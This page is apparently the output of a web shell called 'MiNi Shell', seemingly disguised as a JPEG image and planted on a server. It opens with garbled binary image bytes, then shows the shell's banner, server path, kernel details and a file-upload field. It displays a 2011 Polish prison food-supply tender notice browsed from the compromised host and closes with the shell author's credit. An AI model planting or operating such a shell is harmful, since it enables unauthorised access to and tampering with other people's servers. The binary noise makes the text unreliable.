JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110602/140068-N-2011.html

<p class="kh_header"><b>Grudziądz: DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH - RÓŻNYCH DLA ZAKŁADU KARNEGO NR 2 W GRUDZIĄDZU. Nr sprawy DKw-220-07-2011</b><br>
<b>Numer ogłoszenia: 140068 - 2011; data zamieszczenia: 02.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny nr 2 , ul. Sikorskiego 13/17, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 056 6421460 w. 280, faks 056 6421398.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład Karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH - RÓŻNYCH DLA ZAKŁADU KARNEGO NR 2 W GRUDZIĄDZU. Nr sprawy DKw-220-07-2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem udzielanego zamówienia publicznego jest dostawa, artykułów spożywczych -  różnych w asortymencie wymienionym poniżej:
1. Dokładny opis przedmiotu zamówieni:
Lp.
Nazwa produktu
Kod CPV
Norma
Ilość
szacunkowa [kg-l]
Część 1 - Konserwy mięsne
1
Konserwa mięsna (typu mielonka) 300 g (z otwieraczem)
15131000-5
PN-A-82022
600
2
Pasztet drobiowy 100-150 g opak. Typu
alupak
15131310-1
PN-A-86525
200
3
Pasztet drobiowy 300 g
(z otwieraczem)
15131310-1
PN-A-86525
500
4
Pasztet mazowiecki 300 g
(z otwieraczem)
15131310-1
PN-A-86525
500
Część 2 - Warzywa i owoce przetworzone
1
Chrzan tarty z kwaskiem cytrynowym opak. do 1 kg
15871000-4
PN-R-75520:1993
150
2
Dżem opakowania 20-80 g
15332290-3
PN-A-75100
80
3
Dżem truskawkowy opakowania do 15 kg
15332290-3
PN-A-75100
350
4
Dżem wieloowocowy opakowania do 15 kg
15332290-3
PN-A-75100
1300
5
Groszek konserwowy opak. do 1 kg
15331462-3
PN-76-A-77803
200
6
Koncentrat pomidorowy 30% opak. do 1 kg
15331427-6
PN-75-A-77601
250
7
Koncentrat pomidorowy 30% opak. do 5 kg
15331462-3
PN-76-A-77803
1500
8
Leczo pieczarkowe - opakowanie do 5 kg
15331430-0
PN-A-86951
800
9
Marmolada opak. do 15 kg
15332230-5
PN-93-A-75103
1300
10
Miód sztuczny opak. do 15 kg
15831600-8
PN-82-A-74760
450
11
Pure ziemniaczane opak. do 10 kg
15313000-5
PN-A-74722
200
Część 3 - Przetwory zbożowe
1
Kasza jęczmienna gruba opak. do 30 kg
15613100-9
PN-A-74203
1300
2
Kasza manna opak. do 30 kg
15613100-9
PN-A-74036
700
3
Makaron - świderki, kolanka, rurki opak. do 20 kg
15851100-9
PN-A-74131
1700
4
Makaron - Nitki opak. do 20 kg
15851100-9
PN-A-74131
1200
5
Mąka pszenna typu 500 opak. do 30 kg
15612100-2
PN-A-74022
4000
6
Ryż łuskany biały długoziarnisty opak. do 30 kg
15611000-4
PN-ISO 7301
1600
Część 4 - Przyprawy
1
Bazylia suszona opak. 0,5 kg
15872300-4
PN-A-86959
5
2
Chili mielone opak. 0,5 kg
15870000-7 
PN-A-86967
10
3
Curry opak. 0,5 kg
15871270-7
PN-A-86967
10
4
Cynamon mielony opak. do 0,5 kg
15872200-3
BN-68-8132-09
8
5
Czosnek mielony opak. do 0,5 kg
15871000-4
PN-R-75518
5
6
Herbata granulowana opak. do 10 kg
15863000-5
PN-ISO3720
300
7
Kawa zbożowa opak. do 30 kg
15861000-1
PN-A-79010
500
8
Kminek opak. do 0,5 kg
15872000-1
PN-A-86953
6
9
Koperek suszony opak. do 0,5 kg
15893000-4
PN-63-A-77603
7
10
Kwasek cytrynowy - spożywczy opak. do 0,5 kg
15880000-0
PN-81-A-79734
25
11
Liść laurowy opak. do 0,5 kg
15890000-3
PN-82-R-87011
20
12
Majeranek opak. do 0,5 kg
15890000-3
PN-A-86958
50
13
Majonez opak. do 1 kg
15871273-8
PN-A-86950
120
14
Mleko w proszku odtłuszczone opak. do 25 kg 
15511700-0
PN-92-A-86024
100
15
Musztarda opak. do 1 kg
15871250-1
PN-A-86964
400
16
Ocet Spirytusowy 10% opak. do 1 l
15871110-8
PN-EN 13188
250
17
Oregano suszone opak. do 0,5 kg
15872300-4
PN-A-86967
5
18
Papryka ostra opak. do 0,5 kg
15890000-3
PN-A-86955
50
19
Papryka słodka opak. do 0,5 kg
15890000-3
PN-A-86955
50
20
Pietruszka (natka) suszona w opak. do 0,5 kg
15872300-4
PN-A-86967
60
21
Pieprz naturalny mielony opak. do 0,5 kg
15872100-2
PN-A-86965
10
22
Przyprawa do mięsa mielonego opak. do 0,5 kg
15871270-7
PN-A-86967
6
23
Przyprawa do ryb opak. do 0,5 kg
15871270-7
PN-A-86967
5
24
Przyprawa w płynie (typu maggi) opak. do 1 kg
15890000-3
PN-A-94052
600
25
Sól spożywcza jodowana opak. do 30 kg
15872400-5
PN-C-84081-2
1200
26
Ziele angielskie opak. do 0,5 kg
15890000-3
PN-A-86955
22
27
Zioła prowansalskie opak. do 0,5 kg
15872000-1
PN-A-86967
5
Cześć 5- Wyroby z soi
1
Kotlet sojowy opak. do 30 kg
15890000-3
PN-ISO 5506
100
2
Soja granulat opak. do 30 kg
15890000-3
PN-ISO 5506
160
3
Soja kostka opak. do 30 kg
15890000-3
PN-ISO 5506
100
Cześć 6 - Rośliny strączkowe
1
Fasola biała drobna opak. do 30 kg
03221210-1
PN-75-R65031
900
2
Fasola Jaś gruba opak. do 30 kg
03221210-1 
PN-75-R65031
900
3
Groch łuskany opak. do 30 kg
03221220-4
PN-81-R65032
900
Cześć 7 - Olej spożywczy
1
Olej spożywczy opak. do 10 l
15411100-3
PN-A-86901
1600
Cześć 8 - Cukier
1
Cukier opak. do 30 kg
15831200-4
PN-A-74850
4300

Wszystkie artykuły spożywcze muszą być w pierwszym gatunku.
Podane ilości przedmiotu zamówienia są wielkościami szacunkowymi. Zamawiający zastrzega sobie prawo zmiany ilości dostaw poszczególnych produktów (zwiększenia lub zmniejszenia), przy zachowaniu całkowitej wartości zamówienia lub jej zmniejszenia o maksimum 20%. Z tytułu nie zrealizowania całości dostaw, wykonawcy nie przysługują roszczenia wobec zamawiającego.
Zamówienie będzie realizowane na zasadach i warunkach określonych w SIWZ, w tym
w załącznikach do SIWZ i projekcie umowy.
Dostawy realizowane będą sukcesywnie w ciągu całego okresu trwania umowy, od poniedziałku do piątku w godz. 8:00 - 12:00 z wyłączeniem dni świątecznych w ilościach wynikających z potrzeb zamawiającego. Dostawy realizowane będą, pojazdem o wysokości do 3,50 m.
Planowana ilość dostaw: 
Część 1 - Konserwy mięsne - nie więcej niż 3 dostawy w ciągu trwania umowy.
Część 2 - Warzywa i  owoce przetworzone - nie częściej niż 1 raz w miesiącu.
Część 3 - Przetwory zbożowe - nie częściej niż 1 raz w miesiącu.
Część 4 - Przyprawy - nie częściej niż 1 raz w miesiącu.
Cześć 5 - Wyroby z soi - nie częściej niż 1 raz w miesiącu.
Cześć 6 - Rośliny strączkowe - nie częściej niż 1 raz w miesiącu.
Cześć 7 - Olej spożywczy - nie więcej niż 4 dostawy w ciągu trwania umowy.
Cześć 8 - Cukier - nie częściej niż 1 raz w miesiącu.
Wykonawca zobowiązuje się do dostarczenia towaru do magazynu zamawiającego własnym transportem zgodnie z wymaganiami i procedurami niezbędnymi dla zapewnienia bezpieczeństwa żywności i żywienia określonymi w ustawie z dnia 27.09.2006 r. o bezpieczeństwie żywności
i żywienia, w ilościach zgodnych z zamówieniem telefonicznym lub faksem złożonym dzień przed terminem dostawy. 
Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami jakościowymi opisanymi dla przedmiotu zamówienia. 
Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5, 15.33.00.00-0, 15.61.00.00-7, 15.85.11.00-9, 15.80.00.00-6, 03.22.12.10-1, 03.22.12.20-4, 15.41.11.00-3, 15.83.12.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedstawi podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 do siwz;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedstawi podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 do siwz;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedstawi podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 do siwz;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedstawi podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 do siwz;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedstawi podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 do siwz;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Nie dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana niniejszej umowy jest dopuszczalna na warunkach określonych w art 144 ustawy Pzp. Zmiany w niniejszej umowie mogą zostać wprowadzone w zakresie:
1. nazwy, adresu oraz osób reprezentujących strony,
2. zmiany cen artykułów spożywczych wymienionych w umowie o kwotę nie większą niż wynikająca ze wskaźnika cen towarów i usług konsumpcyjnych podanego przez GUS w Monitorze Polskim w okresie trwania umowy,
3. zmiany cen artykułów spożywczych wymienionych w umowie ze względu na zmianę urzędowej stawki VAT na artykuły, których dotyczy umowa,
4. każdej zmiany która jest korzystna dla zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.sw.gov.pl/pl/okregowy-inspektorat-sluzby-wieziennej-bydgoszcz/zaklad-karny-grudziadz-nr-2<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny Nr 2
ul. Sikorskiego 13/17
86-300 Grudziądz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2011 godzina 12:00, miejsce: Zakład Karny Nr 2
ul. Sikorskiego 13/17
86-300 Grudziądz
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com